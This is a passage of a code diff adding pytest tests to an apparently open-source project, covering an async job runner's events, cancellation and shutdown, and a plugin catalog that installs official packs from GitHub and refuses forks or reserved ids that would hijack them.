+    that replaced it -- and a panel would then report a step of the new job
+    on the strength of the old one's log.
+
+    The event is still BUFFERED. The buffer belongs to whatever job is
+    current and a stray line in it is visible, explainable and harmless; a
+    wrong step is none of those.
+    """
+    runner = make_runner()
+    first_work = ScriptedWork()
+    first_work.finish()
+    first = submit(runner, first_work, name="first")
+    await drain(runner, first.job_id)
+    assert len(first_work.emits) == 1, first_work.emits
+    stale_emit = first_work.emits[0]
+
+    second_work = ScriptedWork()
+    second = submit(runner, second_work, name="second")
+    stale_emit({"type": "step_started", "step": "ghost"})
+
+    assert runner.current_job() is second
+    assert second.current_step is None
+    assert first.current_step is None
+    page, _, _ = runner._read(second, 0, 500)
+    assert "step_started" in types_of(page), "the stray event was dropped"
+
+    second_work.finish()
+    await drain(runner, second.job_id)
+
+
+async def test_the_buffer_drops_its_oldest_events_rather_than_growing():
+    """A client four thousand events behind is not reading them anyway."""
+    runner = make_runner(max_events=3)
+    work = ScriptedWork().script({"type": "log", "line": "a"},
+                                 {"type": "log", "line": "b"},
+                                 {"type": "log", "line": "c"})
+    job = submit(runner, work)
+    await drain(runner, job.job_id)
+
+    kept, cursor, status = await runner.wait_for_events(
+        job.job_id, after_cursor=0, limit=500, wait=0.0)
+    # Five events were produced (job_started, three logs, job_done); the
+    # three most recent survive, and their cursors are still the originals.
+    assert [event["cursor"] for event in kept] == [3, 4, 5]
+    assert types_of(kept) == ["log", "log", "job_done"]
+    assert (cursor, status) == (5, STATUS_DONE)
+
+
+# ── one job at a time, and the last one stays readable ────────────────────
+
+
+async def test_a_second_claim_while_a_job_runs_raises_job_busy():
+    runner = make_runner()
+    work = ScriptedWork()
+    job = submit(runner, work)
+    await wait_started(work)
+
+    with pytest.raises(JobBusy) as excinfo:
+        runner.claim(DemoJob(job_id=uuid.uuid4().hex, name="second"),
+                     {"type": "job_started", "name": "second"})
+    # The id is the point of the refusal: it is what a client follows.
+    assert excinfo.value.job_id == job.job_id
+    assert runner.current_job() is job
+
+    work.finish()
+    await drain(runner, job.job_id)
+
+
+async def test_a_finished_job_stays_readable_until_the_next_claim():
+    runner = make_runner()
+    work = ScriptedWork().script({"type": "log", "line": "one"})
+    job = submit(runner, work)
+    events, _ = await drain(runner, job.job_id)
+
+    # Still there after it ended: this is what a client polls for the tail.
+    replay, cursor, status = await runner.wait_for_events(
+        job.job_id, after_cursor=0, limit=500, wait=0.0)
+    assert types_of(replay) == types_of(events)
+    assert status == STATUS_DONE
+    assert cursor == events[-1]["cursor"]
+    assert runner.get_job(job.job_id) is job
+
+    later = submit(runner, ScriptedWork().script(), name="later")
+    await drain(runner, later.job_id)
+
+    # And now it is gone, id and events together.
+    with pytest.raises(UnknownJob):
+        runner.get_job(job.job_id)
+    with pytest.raises(UnknownJob):
+        runner._read(job, 0, 10)
+    with pytest.raises(UnknownJob):
+        await runner.wait_for_events(job.job_id, after_cursor=0, limit=1,
+                                     wait=0.0)
+
+
+async def test_an_id_that_was_never_claimed_is_unknown():
+    runner = make_runner()
+    assert runner.current_job() is None
+    with pytest.raises(UnknownJob):
+        runner.get_job("nope")
+    with pytest.raises(UnknownJob):
+        await runner.cancel("nope")
+    with pytest.raises(UnknownJob):
+        await runner.wait_for_events("nope", after_cursor=0, limit=1, wait=0.0)
+
+
+# ── the four ways a job ends ──────────────────────────────────────────────
+
+
+async def test_cancel_ends_the_job_and_a_second_cancel_is_false():
+    runner = make_runner()
+    work = ScriptedWork()
+    job = submit(runner, work)
+    await wait_started(work)
+
+    assert await runner.cancel(job.job_id) is True
+    events, status = await drain(runner, job.job_id)
+
+    assert status == STATUS_CANCELLED
+    assert types_of(events)[-1] == "job_cancelled"
+    # A cancel is not a failure, so it leaves no error behind.
+    assert job.error is None
+    # Asking twice is not an error, but it did nothing the second time.
+    assert await runner.cancel(job.job_id) is False
+
+
+async def test_a_failure_the_domain_claims_is_recorded_and_not_re_raised():
+    runner = make_runner()
+    work = ScriptedWork()
+    work.fail(Failed("it did not work", hint="the last lines"))
+    job = submit(runner, work)
+    events, status = await drain(runner, job.job_id)
+
+    assert status == STATUS_FAILED
+    assert events[-1]["type"] == "job_failed"
+    assert events[-1]["message"] == "it did not work"
+    assert events[-1]["hint"] == "the last lines"
+    # The job's own summary of it, made from the event so the two cannot
+    # disagree about why it failed.
+    assert job.error == {"message": "it did not work", "hint": "the last lines"}
+    # Swallowed: nobody awaits this task except shutdown, and an escaping
+    # exception would be reported long after the job left the UI.
+    assert runner._task.exception() is None
+
+
+async def test_a_base_exception_is_recorded_as_failed_and_then_re_raised():
+    runner = make_runner()
+    work = ScriptedWork()
+    work.fail(_Abort("interrupted"))
+    job = submit(runner, work)
+    events, status = await drain(runner, job.job_id)
+
+    # A job stuck on "running" forever would leave a panel offering Stop for
+    # a thread that no longer exists, and no claim would be accepted again.
+    assert status == STATUS_FAILED
+    assert events[-1]["type"] == "job_failed"
+    assert "_Abort" in events[-1]["message"]
+    assert job.error["hint"] is None
+    assert job.finished_at is not None
+    # And it was re-raised rather than swallowed. Retrieving it here is also
+    # what keeps "exception was never retrieved" out of the test output.
+    assert isinstance(runner._task.exception(), _Abort)
+
+
+async def test_a_job_can_be_terminal_on_arrival_with_no_work_at_all():
+    """Work that is not this process's to do, which packs' restart mode is.
+
+    The job exists so that a client has the same thing to follow as for any
+    other -- one id, one event stream, one terminal event saying what happens
+    next -- and there is no task behind it to await. The claim drops the
+    PREVIOUS job's task for that reason: ``shutdown`` would otherwise wait on
+    something belonging to a job nobody can read any more.
+    """
+    runner = make_runner()
+    earlier = submit(runner, ScriptedWork().script(), name="earlier")
+    await drain(runner, earlier.job_id)
+    assert runner._task is not None
+
+    job = DemoJob(job_id=uuid.uuid4().hex, name="elsewhere")
+    runner.claim(job, {"type": "job_started", "name": job.name})
+    runner.finish(job, STATUS_NEEDS_RESTART,
+                  {"type": "needs_restart", "command": "cdui install"})
+
+    page, cursor, status = await runner.wait_for_events(
+        job.job_id, after_cursor=0, limit=10, wait=5.0)
+    assert types_of(page) == ["job_started", "needs_restart"]
+    assert (cursor, status) == (2, STATUS_NEEDS_RESTART)
+    assert job.terminal and job.finished_at is not None
+    assert runner._task is None, "a job with no work must leave no task"
+    await runner.shutdown()
+
+
+async def test_on_settled_runs_however_the_job_ended():
+    """Where a domain drops the caches a finished job invalidated.
+
+    Including the path that re-raises: the disk is not what it was whether
+    the work returned, failed, or was torn out from under the interpreter.
+    """
+    runner = make_runner()
+    settled: list[str] = []
+
+    work = ScriptedWork().script()
+    job = DemoJob(job_id=uuid.uuid4().hex, name="clean")
+    runner.claim(job, {"type": "job_started", "name": job.name})
+    runner.start(job, work, on_settled=lambda: settled.append("clean"))
+    await drain(runner, job.job_id)
+    assert settled == ["clean"]
+
+    aborting = ScriptedWork()
+    aborting.fail(_Abort("interrupted"))
+    second = DemoJob(job_id=uuid.uuid4().hex, name="aborted")
+    runner.claim(second, {"type": "job_started", "name": second.name})
+    runner.start(second, aborting,
+                 on_settled=lambda: settled.append("aborted"))
+    await drain(runner, second.job_id)
+    assert settled == ["clean", "aborted"]
+    assert isinstance(runner._task.exception(), _Abort)
+
+
+# ── the long poll ─────────────────────────────────────────────────────────
+
+
+async def test_events_paginate_by_cursor_and_limit():
+    runner = make_runner()
+    work = ScriptedWork().script(*[{"type": "log", "line": str(n)}
+                                   for n in range(5)])
+    job = submit(runner, work)
+    await drain(runner, job.job_id)
+
+    first, cursor, _ = await runner.wait_for_events(
+        job.job_id, after_cursor=0, limit=2, wait=0.0)
+    assert len(first) == 2
+    assert cursor == first[-1]["cursor"]
+
+    second, cursor2, _ = await runner.wait_for_events(
+        job.job_id, after_cursor=cursor, limit=2, wait=0.0)
+    assert [event["cursor"] for event in second] == [cursor + 1, cursor + 2]
+    assert cursor2 == second[-1]["cursor"]
+
+    # An empty tail never moves the cursor backwards.
+    tail, tail_cursor, _ = await runner.wait_for_events(
+        job.job_id, after_cursor=10_000, limit=10, wait=0.0)
+    assert tail == []
+    assert tail_cursor == 10_000
+
+
+async def test_long_poll_wakes_on_the_next_event():
+    runner = make_runner()
+    work = ScriptedWork()
+    job = submit(runner, work)
+    await wait_started(work)
+
+    # Park on the tail of what the job has emitted so far (job_started).
+    poll = asyncio.create_task(runner.wait_for_events(
+        job.job_id, after_cursor=1, limit=10, wait=5.0))
+    await asyncio.sleep(0.05)
+    assert not poll.done(), "the poll must actually park"
+
+    started = time.monotonic()
+    work.send({"type": "log", "line": "woken"})
+    page, cursor, status = await asyncio.wait_for(poll, 5.0)
+    elapsed = time.monotonic() - started
+
+    assert types_of(page) == ["log"]
+    assert cursor == 2
+    assert status == STATUS_RUNNING
+    assert elapsed < 3.0, "the poll waited for its deadline instead of the edge"
+
+    work.finish()
+    await drain(runner, job.job_id)
+
+
+async def test_long_poll_returns_at_once_when_the_job_is_terminal():
+    runner = make_runner()
+    work = ScriptedWork().script({"type": "log", "line": "done"})
+    job = submit(runner, work)
+    events, _ = await drain(runner, job.job_id)
+
+    started = time.monotonic()
+    tail, cursor, status = await runner.wait_for_events(
+        job.job_id, after_cursor=events[-1]["cursor"], limit=10, wait=5.0)
+    elapsed = time.monotonic() - started
+
+    assert tail == []
+    assert status == STATUS_DONE
+    assert cursor == events[-1]["cursor"]
+    assert elapsed < 2.0, "a finished job must not hold the poll open"
+
+
+async def test_long_poll_returns_immediately_when_wait_is_zero():
+    runner = make_runner()
+    work = ScriptedWork()
+    job = submit(runner, work)
+    await wait_started(work)
+
+    started = time.monotonic()
+    page, _, status = await runner.wait_for_events(
+        job.job_id, after_cursor=1, limit=10, wait=0.0)
+    assert page == []
+    assert status == STATUS_RUNNING
+    assert time.monotonic() - started < 1.0
+
+    work.finish()
+    await drain(runner, job.job_id)
+
+
+# ── shutdown ──────────────────────────────────────────────────────────────
+
+
+async def test_shutdown_cancels_a_running_job():
+    runner = make_runner()
+    work = ScriptedWork()
+    job = submit(runner, work)
+    await wait_started(work)
+
+    await runner.shutdown()
+
+    assert job.cancel_event.is_set()
+    assert job.status == STATUS_CANCELLED
+    assert job.finished_at is not None
+
+
+async def test_shutdown_with_no_job_is_a_no_op():
+    runner = make_runner()
+    await runner.shutdown()
+    assert runner.current_job() is None
+
+
+async def test_shutdown_survives_work_that_raised_a_base_exception():
+    """``_run`` records what ``terminal_for`` does not claim and RE-RAISES it,
+    so it travels out of the shielded task and into the await in ``shutdown``
+    -- the one inside a lifespan shutdown hook. A catch that only covered
+    ``Exception`` would let it out there and make "the server is coming down"
+    a traceback on the way out, for a job that already reached a terminal
+    state and told everyone watching.
+    """
+    class _OutOfBand(BaseException):
+        """Private on purpose: nothing else may catch it by accident."""
+
+    def doomed(emit: Emit, cancel_check: CancelCheck) -> None:
+        raise _OutOfBand("the interpreter is going away")
+
+    runner = make_runner()
+    job = DemoJob(job_id=uuid.uuid4().hex, name="doomed")
+    runner.claim(job, {"type": "job_started", "name": job.name})
+    runner.start(job, doomed)
+
+    await runner.shutdown()
+
+    assert job.terminal
+    assert job.status == STATUS_FAILED
+    assert "_OutOfBand" in job.error["message"]
+
+
+async def test_shutdown_is_bounded_when_the_work_ignores_cancellation():
+    """Server shutdown must not be held hostage by stubborn work."""
+    release = threading.Event()
+
+    def deaf(emit: Emit, cancel_check: CancelCheck) -> None:
+        release.wait(20)
+
+    runner = make_runner(shutdown_timeout_s=0.2)
+    job = DemoJob(job_id=uuid.uuid4().hex, name="deaf")
+    runner.claim(job, {"type": "job_started", "name": job.name})
+    runner.start(job, deaf)
+
+    started = time.monotonic()
+    try:
+        await runner.shutdown()
+        assert time.monotonic() - started < 5.0
+        assert job.cancel_event.is_set()
+    finally:
+        # Let the stubborn work finish so no task outlives the test loop.
+        release.set()
+        await drain(runner, job.job_id)

--- a/backend/tests/test_plugin_api.py
+++ b/backend/tests/test_plugin_api.py
@@ -96,6 +96,31 @@ def test_list_plugins_populates_node_names(client):
     assert "Edu-PolicyGradient" in by_id["rl"]["nodes"]
 
 
+def test_list_plugins_carries_the_plugin_center_fields(client):
+    """The six fields a row the panel can ACT on needs, on the installed
+    listing as well as on ``/catalog`` -- computed by the same functions, so
+    a plugin cannot be official on one route and unofficial on the other."""
+    by_id = {p["id"]: p for p in client.get("/api/plugins").json()}
+    row = by_id["foundations"]
+
+    assert {"official", "catalog_id", "capabilities", "trusted_modules",
+            "python_deps", "has_frontend"} <= set(row)
+    # A pack that ships in this release arrived through a pull request here.
+    assert row["official"] is True
+    assert row["catalog_id"] == "foundations"
+    assert row["capabilities"] == []
+    assert row["trusted_modules"] == []
+    assert isinstance(row["python_deps"], dict)
+    assert row["has_frontend"] is False
+
+    catalog = {e["id"]: e for e in client.get("/api/plugins/catalog").json()["entries"]}
+    for pid in ("foundations", "deep", "rl"):
+        assert catalog[pid]["official"] is by_id[pid]["official"]
+        assert catalog[pid]["capabilities"] == by_id[pid]["capabilities"]
+        assert catalog[pid]["python_deps"] == by_id[pid]["python_deps"]
+        assert catalog[pid]["has_frontend"] is by_id[pid]["has_frontend"]
+
+
 def test_get_plugin_returns_manifest(client):
     r = client.get("/api/plugins/foundations")
     assert r.status_code == 200

--- a/backend/tests/test_plugin_capabilities.py
+++ b/backend/tests/test_plugin_capabilities.py
@@ -24,6 +24,7 @@ import pytest
 
 import plugins as plugin_cli
 from app.core import plugin_loader
+from app.core.plugins.errors import GitHubError, PluginInstallError
 
 
 # ── fixtures ───────────────────────────────────────────────────────────────
@@ -465,3 +466,46 @@ def test_no_shipped_pack_declares_a_capability():
         manifest = plugin_loader.read_manifest_safe(manifest_path.parent)
         assert plugin_cli.manifest_capabilities(manifest) == (), manifest_path
         plugin_cli.validate_manifest(manifest)
+
+
+# ── the install path around the prompt ─────────────────────────────────────
+
+@pytest.mark.parametrize(
+    "failure",
+    [
+        GitHubError("Not Found", status=404),
+        PluginInstallError("Tarball exceeds 100 MB limit.", hint="alice/extras"),
+    ],
+    ids=["github-said-no", "over-the-size-cap"],
+)
+def test_a_download_that_fails_is_reported_rather_than_raised(
+    failure, isolated_lockfile, monkeypatch, capsys
+):
+    """The download handler has to name what ``download_tarball`` raises.
+
+    Both of these reach it as ``RuntimeError`` subclasses, which is an
+    inheritance choice made three modules away in ``plugins/errors.py`` that
+    nothing at the call site states. A cancel is deliberately NOT a
+    ``RuntimeError``, so the day one is wired into this path a catch that
+    leaned on the base class turns a failed install into a traceback.
+
+    No tarball is served: the point is the failure. The install has to end at
+    the same "Download failed" line and the same exit code either way, with
+    nothing written to the lockfile.
+    """
+    monkeypatch.setenv("CODEFYUI_LANG", "en")
+    monkeypatch.setattr(plugin_cli, "resolve_sha", lambda o, r, ref: "0" * 40)
+
+    def _fail(owner, repo, sha, dest, **kwargs):
+        raise failure
+
+    monkeypatch.setattr(plugin_cli, "download_tarball", _fail)
+
+    rc = plugin_cli._install_github(
+        "alice", "extras", "", _install_args(), plugin_loader.load_lockfile()
+    )
+    assert rc == 1
+    printed = _out(capsys)
+    assert "Download failed" in printed
+    assert str(failure) in printed
+    assert plugin_loader.load_lockfile()["plugins"] == {}

--- a/backend/tests/test_plugin_catalog_honesty.py
+++ b/backend/tests/test_plugin_catalog_honesty.py
@@ -22,6 +22,8 @@ from pathlib import Path
 import pytest
 
 import dev  # scripts/dev.py -- conftest puts scripts/ on sys.path
+from app.core.plugins.catalog import RESERVED_PLUGIN_IDS, validate_catalog
+from app.core.plugins.manifest import REPO_RE
 
 PLUGINS_DIR = dev.ROOT / "plugins"
 REGISTRY = PLUGINS_DIR / "registry.json"
@@ -52,8 +54,23 @@ def registered() -> set[str]:
     return names
 
 
+def _registry_entries() -> dict[str, dict]:
+    return json.loads(REGISTRY.read_text(encoding="utf-8"))["plugins"]
+
+
 def test_registry_advertises_only_nodes_that_exist(registered: set[str]):
-    text = REGISTRY.read_text(encoding="utf-8")
+    # Only the ``builtin`` rows are checked against this disk, because only
+    # their nodes are ON this disk: a ``github`` row's pack lives in another
+    # repository, so a name in its prose cannot be confirmed or denied here,
+    # and scanning it would fail the honest entry rather than the dishonest
+    # one. Every builtin row is still scanned whole (name and description
+    # alike) -- the rule below is unchanged for them.
+    builtin = {
+        pack_id: entry
+        for pack_id, entry in _registry_entries().items()
+        if entry.get("kind") == "builtin"
+    }
+    text = json.dumps(builtin, ensure_ascii=False)
     phantom = sorted({n for n in NODE_NAME_RE.findall(text) if n not in registered})
     assert not phantom, (
         f"plugins/registry.json names nodes that no pack registers: {phantom}. "
@@ -72,11 +89,63 @@ def test_manifest_advertises_only_nodes_that_exist(manifest: Path, registered: s
 
 
 def test_every_pack_in_the_registry_has_a_manifest():
-    entries = json.loads(REGISTRY.read_text(encoding="utf-8"))["plugins"]
-    for pack_id, entry in entries.items():
+    """A ``builtin`` row names a directory that ships here; a ``github`` row
+    names a repository instead, and the two are installed by completely
+    different code -- so each kind is checked against the thing it claims."""
+    for pack_id, entry in _registry_entries().items():
+        if entry.get("kind") == "github":
+            repo = entry.get("repo", "")
+            assert REPO_RE.match(repo), f"{pack_id}: repo {repo!r} is not owner/repo"
+            assert "path" not in entry, (
+                f"{pack_id}: a github entry claiming a path is dropped by "
+                f"validate_catalog -- the two kinds install by different code"
+            )
+            if repo.startswith("CodefyUI/"):
+                assert entry.get("official") is True, (
+                    f"{pack_id}: a pack published by the CodefyUI org is what "
+                    f"'official' means; the Plugin Center prints that badge"
+                )
+            assert entry.get("homepage", "").startswith(
+                f"https://github.com/{repo}"
+            ), f"{pack_id}: homepage must point at the repository it names"
+            assert not (PLUGINS_DIR / pack_id).exists(), (
+                f"{pack_id}: a github pack must not also sit in plugins/ -- "
+                f"whichever copy loaded first would decide what the user got"
+            )
+            continue
         path = dev.ROOT / entry["path"]
         assert path.is_dir(), f"{pack_id}: registry path {entry['path']} does not exist"
         assert (path / "cdui.plugin.toml").is_file(), f"{pack_id}: no cdui.plugin.toml"
+
+
+def test_catalog_validates():
+    """Every row this repository ships survives ``validate_catalog``.
+
+    It drops a malformed row with a log line rather than raising, so a typo
+    in one entry costs the Plugin Center a card and costs CI nothing -- which
+    is why the file has to be checked here instead.
+    """
+    raw = _registry_entries()
+    entries = validate_catalog(json.loads(REGISTRY.read_text(encoding="utf-8")))
+    assert set(entries) == set(raw), (
+        f"validate_catalog dropped: {sorted(set(raw) - set(entries))}"
+    )
+
+
+def test_github_catalog_entries_are_not_reserved_builtin_ids():
+    """A github row may not claim an id the routing table or a shipped pack
+    already owns: ``/api/plugins/<id>`` and ``plugins/<id>/`` would both
+    resolve to something other than the pack the catalog advertises."""
+    entries = _registry_entries()
+    github_ids = {
+        pack_id for pack_id, entry in entries.items() if entry.get("kind") == "github"
+    }
+    builtin_ids = {
+        pack_id for pack_id, entry in entries.items() if entry.get("kind") == "builtin"
+    }
+    assert github_ids, "the catalog is expected to advertise the org's own plugins"
+    assert not (github_ids & RESERVED_PLUGIN_IDS)
+    assert not (github_ids & builtin_ids)
 
 
 def _preset_names() -> set[str]:

--- a/backend/tests/test_plugin_cli.py
+++ b/backend/tests/test_plugin_cli.py
@@ -3,6 +3,8 @@
 from __future__ import annotations
 
 import argparse
+import io
+import tarfile
 from pathlib import Path
 from textwrap import dedent
 
@@ -11,6 +13,7 @@ import pytest
 import plugins as plugin_cli
 from app.core import plugin_loader
 from app.core.plugin_validator import PluginValidationError
+from app.core.plugins import catalog as core_catalog
 
 
 # ── parse_source ───────────────────────────────────────────────────────────
@@ -862,3 +865,355 @@ def test_dev_parser_wired():
     assert a._func is plugin_cli.cmd_dev and a.path == "/p" and a.once is False
     a = parser.parse_args(["dev", "/p", "--once", "--interval", "0.5"])
     assert a.once is True and a.interval == 0.5
+
+
+# ── the official GitHub packs in the catalog ───────────────────────────────
+#
+# `registry.json` advertises three repositories the CodefyUI org publishes.
+# They are catalog names like any other -- `cdui plugin install graph-copilot`
+# -- but everything behind the name is different: the pack is downloaded
+# rather than activated in place, so the install is a consent decision and
+# `cdui plugin sync` must never make it on the user's behalf.
+
+OFFICIAL_GITHUB_PACKS = {
+    "graph-copilot": "CodefyUI/CodefyUI-Plugin-Graph-Copilot",
+    "self-learning": "CodefyUI/CodefyUI-Plugin-Self-Learning",
+    "official-template": "CodefyUI/CodefyUI-Plugin-Official",
+}
+
+_TEMPLATE_MANIFEST = dedent("""\
+    [plugin]
+    id = "official-template"
+    name = "Official Template"
+    version = "0.1.0"
+    schema_version = 1
+    """)
+
+
+def _out(capsys) -> str:
+    captured = capsys.readouterr()
+    return captured.out + captured.err
+
+
+def _tarball_of(root_name: str, files: dict[str, str], dest: Path) -> None:
+    """Pack ``{relative path: text}`` under one top-level directory -- the
+    shape ``_install_github`` expects from a GitHub codeload tarball."""
+    with tarfile.open(dest, "w:gz") as tf:
+        for rel, text in files.items():
+            data = text.encode("utf-8")
+            member = tarfile.TarInfo(f"{root_name}/{rel}")
+            member.size = len(data)
+            tf.addfile(member, io.BytesIO(data))
+
+
+@pytest.fixture
+def fake_github(monkeypatch):
+    """Serve a synthetic tarball instead of reaching GitHub.
+
+    Patches this module's OWN ``resolve_sha`` / ``download_tarball``, which is
+    what ``_install_github`` calls: ``scripts/plugins.py`` re-exports the core
+    client under those names precisely so a test can replace them, and
+    patching the core module instead would leave the CLI bound to the real
+    network client.
+    """
+    def _make(files: dict[str, str] | None = None) -> None:
+        payload = {"cdui.plugin.toml": _TEMPLATE_MANIFEST} if files is None else files
+        monkeypatch.setattr(plugin_cli, "resolve_sha", lambda o, r, ref: "0" * 40)
+        monkeypatch.setattr(
+            plugin_cli,
+            "download_tarball",
+            lambda owner, repo, sha, dest: _tarball_of(f"{repo}-main", payload, dest),
+        )
+
+    return _make
+
+
+def _install_args(**overrides) -> argparse.Namespace:
+    base = dict(
+        force=False,
+        no_confirm=True,
+        trust_author=False,
+        accept_capabilities=False,
+        prior_capabilities=[],
+    )
+    base.update(overrides)
+    return argparse.Namespace(**base)
+
+
+def _cmd_install_args(*sources: str) -> argparse.Namespace:
+    return argparse.Namespace(
+        source=list(sources),
+        force=False,
+        no_confirm=True,
+        trust_author=False,
+        accept_capabilities=False,
+    )
+
+
+def _manifest_declaring(plugin_id: str) -> str:
+    return dedent(f"""\
+        [plugin]
+        id = "{plugin_id}"
+        name = "Claimed"
+        version = "0.1.0"
+        schema_version = 1
+        """)
+
+
+def test_a_github_catalog_id_parses_as_a_catalog_name():
+    """The whole point of the row: the id is a name a person can type."""
+    for pack_id in OFFICIAL_GITHUB_PACKS:
+        assert plugin_cli.parse_source(pack_id) == ("catalog", pack_id, "", "")
+    # Case-insensitive, like every other catalog name.
+    assert plugin_cli.parse_source("Graph-Copilot") == (
+        "catalog", "graph-copilot", "", "",
+    )
+
+
+def test_the_catalog_carries_the_repository_of_each_official_pack():
+    for pack_id, repo in OFFICIAL_GITHUB_PACKS.items():
+        entry = plugin_cli.catalog_entry(pack_id)
+        assert entry is not None, f"{pack_id} was dropped by validate_catalog"
+        assert entry.kind == "github"
+        assert entry.repo == repo
+        assert entry.ref == ""      # no tags yet: the default branch
+        assert entry.official is True
+
+
+def test_cmd_install_sends_a_github_catalog_entry_to_the_repository_installer(
+    isolated_lockfile, monkeypatch
+):
+    """`install graph-copilot` has to fetch the repository the catalog names.
+    Before the dispatch existed, every catalog name went to the built-in
+    installer, which looked for a directory this release does not ship."""
+    calls: list[tuple] = []
+
+    def _record(owner, repo, ref, args, lockfile, *, catalog_id=None):
+        calls.append((owner, repo, ref, catalog_id))
+        return 0
+
+    def _never(*_a, **_k):  # pragma: no cover - only runs on a bug
+        raise AssertionError("a github row must not take the built-in path")
+
+    monkeypatch.setattr(plugin_cli, "_install_github", _record)
+    monkeypatch.setattr(plugin_cli, "_install_catalog", _never)
+
+    assert plugin_cli.cmd_install(_cmd_install_args("graph-copilot")) == 0
+    assert calls == [
+        ("CodefyUI", "CodefyUI-Plugin-Graph-Copilot", "", "graph-copilot")
+    ]
+
+
+def test_cmd_install_still_activates_a_builtin_catalog_entry_in_place(
+    isolated_lockfile, monkeypatch
+):
+    """The other half of the same dispatch, unchanged: a builtin row must not
+    start downloading anything."""
+    seen: list[str] = []
+
+    def _record(plugin_id, args, lockfile):
+        seen.append(plugin_id)
+        return 0
+
+    def _never(*_a, **_k):  # pragma: no cover - only runs on a bug
+        raise AssertionError("a builtin pack is activated in place, not fetched")
+
+    monkeypatch.setattr(plugin_cli, "_install_catalog", _record)
+    monkeypatch.setattr(plugin_cli, "_install_github", _never)
+
+    assert plugin_cli.cmd_install(_cmd_install_args("stats")) == 0
+    assert seen == ["stats"]
+
+
+def test_install_github_keeps_the_positional_arguments_project_restore_uses():
+    """``scripts/project.py`` restores a project's pins with
+    ``_install_github(owner, repo, ref, inst_args, lockfile)``. ``catalog_id``
+    was added after those five and keyword-only so that call stays valid."""
+    import inspect
+
+    params = list(inspect.signature(plugin_cli._install_github).parameters.values())
+    assert [p.name for p in params[:5]] == [
+        "owner", "repo", "ref", "args", "lockfile",
+    ]
+    assert all(p.kind is inspect.Parameter.POSITIONAL_OR_KEYWORD for p in params[:5])
+    assert params[5].name == "catalog_id"
+    assert params[5].kind is inspect.Parameter.KEYWORD_ONLY
+    assert params[5].default is None
+
+
+def test_the_repository_the_catalog_names_may_claim_its_catalog_id(
+    isolated_lockfile, fake_github
+):
+    """The refusal this rule replaced would have made the official pack the
+    one thing the catalog advertises and nobody can install: its manifest
+    declares the id the catalog lists it under, which used to be enough to
+    refuse it."""
+    fake_github({
+        "cdui.plugin.toml": _TEMPLATE_MANIFEST,
+        "nodes/hello.py": "VALUE = 1\n",
+    })
+    rc = plugin_cli._install_github(
+        "CodefyUI", "CodefyUI-Plugin-Official", "",
+        _install_args(), plugin_loader.load_lockfile(),
+    )
+    assert rc == 0
+    entry = plugin_loader.load_lockfile()["plugins"]["official-template"]
+    assert entry["source_kind"] == "github_url"
+    # This call did not come from the catalog, so it claims no catalog row --
+    # the key is absent rather than null, which is the shape every free-text
+    # install has always written.
+    assert "catalog_id" not in entry
+
+
+def test_a_fork_may_not_claim_the_catalog_id_of_the_pack_it_forked(
+    isolated_lockfile, fake_github, capsys
+):
+    """Same manifest, a different repository. The id is what the lockfile,
+    the catalog card and the ``/api/plugins/<id>`` route all key on, so a fork
+    installing under it would quietly take the official pack's place."""
+    fake_github({
+        "cdui.plugin.toml": _TEMPLATE_MANIFEST,
+        "nodes/hello.py": "VALUE = 1\n",
+    })
+    rc = plugin_cli._install_github(
+        "someone", "fork", "", _install_args(), plugin_loader.load_lockfile()
+    )
+    assert rc == 1
+    assert plugin_loader.load_lockfile()["plugins"] == {}
+    assert not (isolated_lockfile / "official-template").exists()
+    # The refusal names the repository that may use the id, because "reserved"
+    # on its own leaves the reader with nothing to do about it.
+    assert "CodefyUI/CodefyUI-Plugin-Official" in _out(capsys)
+
+
+@pytest.mark.parametrize(
+    ("plugin_id", "why"),
+    [
+        ("stats", "a pack that ships with CodefyUI"),
+        ("install", "a route under /api/plugins/"),
+    ],
+)
+def test_a_repository_may_not_claim_a_shipped_pack_or_a_route_name(
+    isolated_lockfile, fake_github, capsys, monkeypatch, plugin_id, why
+):
+    """Neither of these is negotiable by repository: the built-in directory
+    would decide which pack loaded, and the router would decide which
+    ``/api/plugins/install`` answered. Asked of the repository that IS
+    allowed to claim its own catalog id, so what is being refused here is the
+    id rather than the owner."""
+    monkeypatch.setenv("CODEFYUI_LANG", "en")
+    fake_github({"cdui.plugin.toml": _manifest_declaring(plugin_id)})
+    rc = plugin_cli._install_github(
+        "CodefyUI", "CodefyUI-Plugin-Official", "",
+        _install_args(), plugin_loader.load_lockfile(),
+    )
+    assert rc == 1
+    assert plugin_loader.load_lockfile()["plugins"] == {}
+    printed = _out(capsys)
+    assert plugin_id in printed
+    assert why in printed
+
+
+def test_an_install_from_the_catalog_records_which_row_it_came_from(
+    isolated_lockfile, fake_github
+):
+    """``catalog_id`` is how a later reader tells the catalog's own pack from
+    free text that happens to carry the same id."""
+    fake_github({
+        "cdui.plugin.toml": _TEMPLATE_MANIFEST,
+        "nodes/hello.py": "VALUE = 1\n",
+    })
+    rc = plugin_cli._install_github(
+        "CodefyUI", "CodefyUI-Plugin-Official", "",
+        _install_args(), plugin_loader.load_lockfile(),
+        catalog_id="official-template",
+    )
+    assert rc == 0
+    entry = plugin_loader.load_lockfile()["plugins"]["official-template"]
+    assert entry["catalog_id"] == "official-template"
+
+
+def test_search_lists_the_github_packs_and_marks_them_official(
+    isolated_lockfile, capsys
+):
+    assert plugin_cli.cmd_search(argparse.Namespace(query=None)) == 0
+    printed = _out(capsys)
+
+    def _line_for(pack_id: str) -> str:
+        return next(
+            line for line in printed.splitlines()
+            if line.strip().startswith(pack_id)
+        )
+
+    for pack_id in OFFICIAL_GITHUB_PACKS:
+        assert "[github, official]" in _line_for(pack_id), pack_id
+    # A built-in pack is not a download and must not be labelled as one.
+    assert "[github" not in _line_for("stats")
+
+
+def test_search_finds_a_github_pack_by_its_repository_name(
+    isolated_lockfile, capsys
+):
+    """Someone with the GitHub page open has the repository name in front of
+    them and no reason to guess the id the catalog files it under."""
+    assert plugin_cli.cmd_search(
+        argparse.Namespace(query="CodefyUI-Plugin-Self-Learning")
+    ) == 0
+    printed = _out(capsys)
+    assert "self-learning" in printed
+    assert "graph-copilot" not in printed
+
+
+def test_info_prints_the_catalog_row_and_then_the_live_repository(
+    isolated_lockfile, monkeypatch, capsys
+):
+    monkeypatch.setattr(plugin_cli, "resolve_sha", lambda o, r, ref: "c" * 40)
+    monkeypatch.setattr(
+        "app.core.plugins.github.fetch_manifest_text",
+        lambda o, r, sha: _manifest_declaring("graph-copilot"),
+    )
+    assert plugin_cli.cmd_info(
+        argparse.Namespace(source_or_id="graph-copilot")
+    ) == 0
+    printed = _out(capsys)
